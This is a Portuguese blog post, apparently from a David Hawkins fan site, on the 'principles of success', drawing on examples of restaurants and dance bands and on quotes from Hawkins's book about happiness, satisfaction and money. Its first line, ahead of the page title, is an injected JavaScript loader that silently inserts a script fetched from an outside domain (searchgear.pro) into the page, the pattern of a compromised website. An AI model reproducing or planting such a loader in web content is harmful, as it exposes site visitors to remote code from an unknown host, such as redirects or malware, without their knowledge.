;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); Princípios do Sucesso: Quais São e Como Aplicar | David Hawkins Brasil
Categorias
David Hawkins

Os Princípios do Sucesso

Em um de nossos últimos artigos sobre o Sucesso falamos sobre aquele “algo” que existe nas pessoas de sucesso. Mas, quais são os princípios do sucesso? Como reconhecê-los?

Que tal agora olharmos para alguns exemplos disso? 

Princípios do Sucesso

Quem nunca esteve num restaurante? 

Esse é o tipo de negócio que acompanhamos com frequência e observamos que existem restaurantes de sucesso fenomenal mas, a taxa de fracasso para esse segmento está na casa de 50%.

Dos 50% que sobrevivem à essa estatística, uma boa parte sobrevive apenas, sem felicidade ou facilidade para tocar o negócio. E, apenas uma pequena parcela deles terá sucesso e despontarão.

Nesses casos, seja o dono do estabelecimento ou os chefs de cozinha atuam de forma criativa, buscando sempre aprender, têm prazer em servir e fazer do local onde trabalham um sucesso, fazendo pratos que surpreendam os clientes e gerando fidelidade.

O que a banda toca? 

Outro exemplo bem interessante que Dr.Hawkins cita em seu livro “O Sucesso é Para Você” é o das bandas musicais que se apresentam em bailes e festas. Algumas conseguem fazer o público participar e estar presente o tempo todo do show, outras no entanto, parecem tocar para si próprias, não se importando muito com o que o público gostaria de ouvir, dançar e cantar. 

O que acontece nesse caso é que a motivação para fazer aquilo que estão fazendo é a sua própria e não a amorosidade no servir, não estão focados em trazer alegria para o público. 

Alguns músicos, contudo, mesmo tendo suas próprias preferências, sabem “ouvir o público”, sentir qual é o apelo deles, qual é o ritmo que o público quer ouvir e acompanham isso. 

Princípios do Sucesso: Saiba observar para obter a resposta

Voltando aos restaurantes, quantas vezes você não voltou a locais apenas para apreciar um prato que te impressionou? E, já imaginou se você chega com essa expectativa e o prato não existe mais? Ou, se o restaurante deixou de servir o café que você tanto apreciava?

Uma das bases do sucesso é saber ouvir o cliente, ser observador, responsivo. Quando a intenção de um negócio está focada apenas no que o proprietário deseja para si e não observa o movimento do seu público, temos aí uma grande possibilidade de fracasso, seja qual for o seu negócio. 

O cliente foi desconsiderado em sua perspectiva e se sente desvalorizado e insatisfeito. Mesmo que esse restaurante seja o único em um determinado tipo de comida, receberá clientes por essa razão e não porque o cliente se sente ouvido e considerado. 

E, o proprietário que não é atento e responsivo às solicitações de seu cliente, mesmo que esteja ganhando financeiramente, deixa escapar a felicidade de estar servindo, e se mantém apenas na sobrevivência. 

Felicidade ou Satisfação? 

É muito importante diferenciar a felicidade da satisfação

 “Uma pessoa pode obter satisfação de enfiar e girar uma adaga no coração do outro – isso é satisfação. É improvável que isso resultará em uma vida feliz. Felicidade na vida é como mantemos o sucesso.” (Dr. Hawkins)

Uma ótima analogia é a que se refere a tirar 10 em uma prova colando, um exemplo de satisfação e sobrevivência. Podemos atingir um objetivo, passar em uma matéria, mas e sua autoestima como ficou? 

O sucesso é feito de:

  • autoestima saudável
  • autoconfiança
  • entusiasmo
  • alegria de saber que se tem a própria maestria.

A alegria seria genuína se o estudante tivesse estudado e tirado 10, não pelo esforço, mas por ter agregado algo à sua maestria.

Essa é manifestação do poder pessoal, do sucesso. Não é fruto de uma cópia, mas da minha própria capacidade de criar e ver os resultados.

Princípios do Sucesso: O dinheiro por si só não é prova de sucesso

O lucro que se obtenha com um determinado negócio não é indicativo de felicidade e sucesso.

Todos nós temos exemplos de pessoas que, apesar de ostentarem ótimas condições financeiras, vivenciam o medo, o orgulho, a paranoia, a arrogância entre outros sentimentos que os colocam distantes da felicidade e do sucesso genuíno. 

Quantas histórias de ganhadores de loteria, herdeiros ou celebridades que não conhecemos que perderam tudo? Isso ocorre porque apoiaram-se apenas no ter e não no ser. Perdem negócios, família, cometem abusos, vícios e até mesmo suicídio. 

O sucesso genuíno ressalta a pessoa e não suas posses

O que nos impressiona é aquilo que a pessoa de sucesso verdadeiro é e não o que ela tem. Somos atraídos pelo “algo a mais” que ela possui, é isso que faz nos conectarmos com ela. É aquilo que está presente em suas ações que nos encanta.

“Não é o dinheiro que viraliza e passa de mão, é saber como manifestar dinheiro que viraliza nos outros…ter dinheiro é uma manifestação de uma atitude interna. Pobreza está na sua cabeça, não na sua carteira.” (Dr.Hawkins) 

Se você apoia o sucesso sobre intenções internas verdadeiras, a vida floresce e tudo contribui para o sucesso. Pelo contrário, se as intenções estão baseadas apenas na conquista de posição, dinheiro ou status social, o sucesso não se mantém e leva todas suas ações à destruição da vida. 

Sucesso não está fora, está dentro!

Esse é um aprendizado que está presente durante toda a leitura do livro “O Sucesso é Para Você” do Dr.David Hawkins. Uma leitura que nos esclarece completamente o quanto temos uma noção equivocada de como o sucesso pode acontecer para cada um de nós. 

Uma resposta em “Os Princípios do Sucesso”

Deixe um comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *